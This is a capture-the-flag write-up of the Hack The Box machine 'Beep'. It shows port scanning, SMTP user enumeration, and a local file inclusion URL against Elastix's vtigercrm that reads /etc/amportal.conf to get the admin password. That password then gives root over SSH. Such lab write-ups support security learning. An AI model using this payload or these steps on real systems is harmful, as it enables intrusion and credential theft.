Hack The Box: Beep


Enumeration

box beep

nmap reveals 11 open ports: 22, 25, 80, 110, 111, 143, 443, 993, 995, 3306, 4445 and 10000.

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:                                                                                                                                                 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)                                                                                                 
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)                                                                                                 
25/tcp    open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.129.68.60/
110/tcp   open  pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            938/udp   status
|_  100024  1            941/tcp   status
143/tcp   open  imap?
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_ssl-date: 2022-11-10T11:35:47+00:00; +59m59s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08 
|_Not valid after:  2018-04-07T08:22:08 
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
| http-robots.txt: 1 disallowed entry 
|_/
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_mysql-info: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1

Visiting the website on port 80 shows an SSL error:

box beep

We need to manually enable TLS 1.0 to view the page. After that, we can see a login screen:

box beep

I tried some default passwords, but with no success.


After that, I tried to connect to the SMTP port with telnet. I discovered that the domain is beep.localdomain and that we have a user root on the machine:

$ telnet 10.129.68.60 25
Trying 10.129.68.60...
Connected to 10.129.68.60.
Escape character is '^]'.
220 beep.localdomain ESMTP Postfix
VRFY root
252 2.0.0 root
VRFY admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

msfconsole found the following additional users:

msf6 auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.129.68.60:25       - 10.129.68.60:25 Banner: 220 beep.localdomain ESMTP Postfix
[+] 10.129.68.60:25       - 10.129.68.60:25 Users found: , adm, bin, daemon, dbus, fax, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mysql, news, nobody, ntp, operator, postfix, postgres, postmaster, rpc, rpcuser, shutdown, sshd, sync, uucp, webmaster, www
[*] 10.129.68.60:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I also tested the mysql remote login, but it didn’t work:

$ mysql -h 10.129.68.60 -u root -p
Enter password: 
ERROR 1130 (HY000): Host '10.10.14.31' is not allowed to connect to this MySQL server

Unfortunately, I couldn’t get gobuster to run because of the TLS issue, even with the no-tls-verification flag. Next, I started looking for some exploits regarding Elastix and found an RCE on searchsploit, which sends a reverse shell to the sub-URL /recordings/misc/callme_page.php. So I tested if this URL exists and I got an empty page, so it seems to exist. After a little bit of clicking around, I also found an admin panel and another login page.

box beep

At this point, I tried several exploits for RCE, with Python, Browser, CURL or metasploit, but all of them failed. So I moved on to another exploit: Local File Inclusion. The perl script on searchsploit shows a sample URL that publishes data:

https://10.129.68.60//vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

And inside the data is the administrator password.

box beep

We can log in with that password! And it is even equivalent to the root password. Since the SSH key exchange is so outdated, we need to specify the algorithms in order to be able to log in:

$ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 -oHostKeyAlgorithms=+ssh-dss root@10.129.68.60

And with that, we are logged in as root.